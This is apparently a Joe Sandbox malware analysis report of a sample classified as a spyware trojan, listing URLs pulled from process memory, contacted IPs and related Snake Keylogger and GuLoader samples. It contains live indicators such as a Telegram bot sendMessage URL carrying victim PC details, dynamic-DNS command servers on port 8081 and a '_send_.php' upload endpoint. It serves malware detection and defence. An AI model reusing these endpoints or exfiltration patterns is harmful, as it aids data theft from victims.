                          https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchsvchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://duckduckgo.com/ac/?q=svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/downloadsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://api.telegram.orgsvchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.org/botsvchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://eicar.org/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://support.google.com/chrome/?p=plugin_flashsvchost.exe, 00000008.00000002.33970405843.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005977000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-nsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://chrome.google.com/webstore?hl=ensvchost.exe, 00000008.00000002.33970405843.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://varders.kozow.com:8081svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.eicar.org/download-anti-malware-testfile/:svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttpsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339Bsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://checkip.dyndns.org/qsvchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://secure.eicar.org/eicar.com;svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292Ksvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://duckduckgo.com/chrome_newtab0svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://secure.eicar.org/eicar.com.txtDsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bTsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://ocsp.quovadisoffshore.com0svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesvchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://reallyfreegeoip.org/xml/svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://www.office.com/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://secure.eicar.org/eicar.comsvchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exesvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://packetstormsecurity.com/files/download/22459/BIOS320.EXEsvchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://secure.eicar.org/eicar.com.txt/svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.google.com/search?q=eicarsvchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://secure.eicar.org/eicar.com/svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://secure.eicar.org/eicar.com.svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://aborters.duckdns.org:8081svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.autoitscript.com/site/autoit/downloads/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://www.eicar.org/download-anti-malware-testfile/Downloadsvchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://www.eicar.org/download-anti-malware-testfile/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://packetstormsecurity.com/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://anotherarmy.dns.army:8081svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.eicar.org/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.office.com/lB5rsvchost.exe, 00000008.00000002.33970405843.00000000058F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://reallyfreegeoip.orgsvchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://reallyfreegeoip.org/xml/154.16.192.225$svchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000577D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://www.quovadis.bm0svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20asvchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQsvchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://packetstormsecurity.com/files/22459/BIOS320.EXE.htmlsvchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.google.com/svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedsvchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://secure.eicar.org/eicar.com.txtsvchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown

                                                                                                                                          World Map of Contacted IPs

                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs

                                                                                                                                          Public IPs

                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          149.154.167.220
                                                                                                                                          		api.telegram.orgUnited Kingdom
                                                                                                                                          		62041TELEGRAMRUtrue
                                                                                                                                          104.21.67.152
                                                                                                                                          		reallyfreegeoip.orgUnited States
                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                          158.101.44.242
                                                                                                                                          		checkip.dyndns.comUnited States
                                                                                                                                          		31898ORACLE-BMC-31898UStrue

                                                                                                                                          General Information

                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1541369
                                                                                                                                          Start date and time:2024-10-24 18:33:49 +02:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 9m 12s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                          Number of analysed new started processes analysed:6
                                                                                                                                          Number of new started drivers analysed:3
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Sample name:g1TLK7mbZD.img
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.troj.spyw.evad.winIMG@7/8@3/3
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                          Warnings

                                                                                                                                          • Exclude process from analysis (whitelisted): vhdmp.sys, dllhost.exe, fsdepends.sys
                                                                                                                                          • Excluded domains from analysis (whitelisted): ecs.office.com, ctldl.windowsupdate.com
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • VT rate limit hit for: g1TLK7mbZD.img

                                                                                                                                          Simulations

                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          12:35:55API Interceptor24x Sleep call for process: powershell.exe modified
                                                                                                                                          12:36:02API Interceptor13985615x Sleep call for process: svchost.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          149.154.167.220Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                            kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                                                              REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                  226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                    BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          RTGS_UCB_DCCB_docx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              104.21.67.152Justificante de pago.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                dg_official01.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                  FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      HSBC Advice_ACH Credit.com.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                        New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                            Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                              Order 8391-6.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                Company Profile.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  158.101.44.242Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
                                                                                                                                                                                  InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                  • checkip.dyndns.org/
